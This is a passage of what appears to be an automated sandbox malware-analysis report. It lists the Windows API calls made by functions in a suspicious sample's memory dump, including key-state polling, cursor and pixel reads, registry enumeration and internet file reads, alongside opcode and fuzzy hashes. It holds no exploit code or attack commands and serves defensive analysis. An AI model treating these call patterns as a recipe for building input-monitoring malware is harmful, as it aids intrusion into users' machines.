                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00EA1A7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00EA197B
                                                                                                                                                                                                                                        • Part of subcall function 00E93AA0: RtlAllocateHeap.FWRHGLUIBB(00000000,?,?,?,00E80075,?,?,00ED0FE4,0000FFFF), ref: 00E93AD2
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00EA1A7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00EA19F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapInfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1443698708-0
                                                                                                                                                                                                                                      • Opcode ID: 9f634973d7a215adb4ab29d73bcb43781bf0d8d18d408f7c5d3e5deaae689c49
                                                                                                                                                                                                                                      • Instruction ID: b60c9f33da8813acd71d3b6e22e98c75251866dccbfbac0ee9ef5319fccb0b4a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f634973d7a215adb4ab29d73bcb43781bf0d8d18d408f7c5d3e5deaae689c49
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F591A372E012169EDF248E64CC81AEE7BF5AF4E714F1865A9E805FF181DB28ED40C760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00EEAC80
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00EEAC8E
                                                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00EEACC1
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00EEAE96
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                                                                                                      • Opcode ID: 9c901347245fc7ce85155fc44d2c5ac026f44ec3317c345cc2da378cf7098c86
                                                                                                                                                                                                                                      • Instruction ID: 5ec102d7450b05e499cd8754ea0903b49bbe62680b3ecf4178cf446bf930d40d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c901347245fc7ce85155fc44d2c5ac026f44ec3317c345cc2da378cf7098c86
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4A1D2716043009FD720DF29D886F2AB7E1AF84718F14986DF599AB392D771ED40CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EED1F1: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EEBF07,?,?), ref: 00EED20E
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EEC2FE
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EEC359
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EEC3BC
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00EEC3FF
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EEC40C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3740051246-0
                                                                                                                                                                                                                                      • Opcode ID: 440b5f10ccb2837c703af53fc6b269e3273a220e355d2c1ffed1b33c92a5c4e4
                                                                                                                                                                                                                                      • Instruction ID: 35cc7ca4f8d4f3b814d7f40bf1efabdc42b70478f01c77d9312587d4d63a097e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 440b5f10ccb2837c703af53fc6b269e3273a220e355d2c1ffed1b33c92a5c4e4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3861D631208245EFC714DF15C890E6ABBE5FF84348F14959DF096AB2A2CB31ED46CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EC926B
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 00EC92DC
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32 ref: 00EC933B
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EC93AE
                                                                                                                                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00EC93D9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4136290138-0
                                                                                                                                                                                                                                      • Opcode ID: 1a4477b8acf84f090d5e06df508b519f783b89e06f6896750de8267b557faa54
                                                                                                                                                                                                                                      • Instruction ID: eb188e727ddd426b98c50ea96f14c64e4b0013ca1591ff64098967850e425cf6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a4477b8acf84f090d5e06df508b519f783b89e06f6896750de8267b557faa54
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56517CB1A00259EFCB14CF68C894EAAB7F9FF89314B018159F905EB350D731E912CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00ED93FE
                                                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00ED942A
                                                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00ED9482
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00ED94A7
                                                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00ED94AF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2832842796-0
                                                                                                                                                                                                                                      • Opcode ID: e99bc386d5f0eab42529430ee5d3051a847b7596c08f12065baa48f9e0cc1452
                                                                                                                                                                                                                                      • Instruction ID: 0a1d2b3b465fa549c4a0e845d0368e32a3248683125758e384ed48740be90942
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e99bc386d5f0eab42529430ee5d3051a847b7596c08f12065baa48f9e0cc1452
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5515C35A00215EFCB04DF65D880AAEBBF5FF49358F049459E849AB362CB35ED46CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EF7433
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00EF744A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EF7473
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00EDB3C9,00000000,00000000), ref: 00EF7498
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EF74C7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3688381893-0
                                                                                                                                                                                                                                      • Opcode ID: 701138a61e42d9943596b4ab6b9de5a88051288b619e943f3fea6fe62077da1a
                                                                                                                                                                                                                                      • Instruction ID: ed32b46528f320ecca8be6f8ea162a7a80729e5ca4b0bad2c0bcb7525b4fcb27
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 701138a61e42d9943596b4ab6b9de5a88051288b619e943f3fea6fe62077da1a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF41D135A08118AFD725DF28CC88FB97FA5FB49364F155224FAA5BB2E0C770AD01DA50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00E6136E
                                                                                                                                                                                                                                      • ScreenToClient.USER32(00000000,?), ref: 00E6138B
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00E613C2
                                                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00E613DC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                                                                                      • Opcode ID: 166a5cd3c92952ac2803d7836cf14a4943c399356ffa0387b1e26ad941e8f00c
                                                                                                                                                                                                                                      • Instruction ID: 94ecf544bd390b39bf75dcf1695c9f488a980df0f437be741ce7fe2ef86c9094
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 166a5cd3c92952ac2803d7836cf14a4943c399356ffa0387b1e26ad941e8f00c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB41AF7160410AFBDB069F68D844AFEB7B4FB09324F24921AF535BB290CB306E50DB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 00ED411B
                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00ED4172
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00ED419B
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00ED41A5
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED41B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                                                                                                      • Opcode ID: 18dad349b0e9f2bc2fab3b8466ab2ce1b24a87decf47b4d76722982aac4ab767
                                                                                                                                                                                                                                      • Instruction ID: fc87d8c8e17655d159dc0156322045e51036153108a7020a4de29df038bf17fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18dad349b0e9f2bc2fab3b8466ab2ce1b24a87decf47b4d76722982aac4ab767
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4131B3F0505345DFEB24DB649C49BB63BE9EB30318F04156BE462E62E0E774948BDB21
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00EDD788
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00EDD7BF
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,00EDCA6E,00000000), ref: 00EDD804
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EDCA6E,00000000), ref: 00EDD818
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EDCA6E,00000000), ref: 00EDD842
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3191363074-0
                                                                                                                                                                                                                                      • Opcode ID: 276f407893a4078107f0286a260c277c4a6d2dafc3264d82df09728ea8ac9b0f
                                                                                                                                                                                                                                      • Instruction ID: 78a06ddc1b454f482a314eaa67880fcc1b9a58493f773b4c593332602fc11482
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 276f407893a4078107f0286a260c277c4a6d2dafc3264d82df09728ea8ac9b0f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06314C75908205EFDB25DFA5CC84AAFBBF8EB44314B10546FF50AE6241D730AE46EB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EC1F9F
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 00EC204B
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00EC2053
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00EC2064
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00EC206C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                                                      • Opcode ID: dc0c7f34cfdab8f53244f0aa67f2efd1b72dfa7a5dd375bdd308f15c2f7dbabe
                                                                                                                                                                                                                                      • Instruction ID: 97b2aeac6549222fc5d8eac59424bb8f3844345fffc4e1b6228802afdbbf063b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc0c7f34cfdab8f53244f0aa67f2efd1b72dfa7a5dd375bdd308f15c2f7dbabe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25319071900219EFDB14CFA8CD89BEE3BB6EB44315F10521EFA25A72D0C3719945DB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00EE11AA
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00EE11C1
                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00EE11FD
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00EE1209
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00EE1241
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                                                      • Opcode ID: 4de0715fb120716b28c3b008c600f9c046605e00137a6c1378ac98e0859cc033
                                                                                                                                                                                                                                      • Instruction ID: 90f81754d691b09afcef884118b559507194a1233a44664612d7a89a00228a16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4de0715fb120716b28c3b008c600f9c046605e00137a6c1378ac98e0859cc033
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70219335600214AFD704EF66DC88AAEBBF5EF88340B058469E95AE7351CB30AC44DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E79899
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E798A8
                                                                                                                                                                                                                                      • BeginPath.GDI32(?), ref: 00E798BF
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00E798E8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                                                                                      • Opcode ID: 498df72870817c859087f48fde6f07d9f9fac38cb3695a00a8061f913fbfde65
                                                                                                                                                                                                                                      • Instruction ID: 5acecd835191968c55cc2e3a7d3911f75aa252d9cfe593dc8f7277713f85d62e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 498df72870817c859087f48fde6f07d9f9fac38cb3695a00a8061f913fbfde65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47218330806209EFEB159F29EC08BA97BB6BB82375F109216F414B61A2D7719855FB81
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00EC0570,80070057,?,?,?,00EC098D), ref: 00EC065A
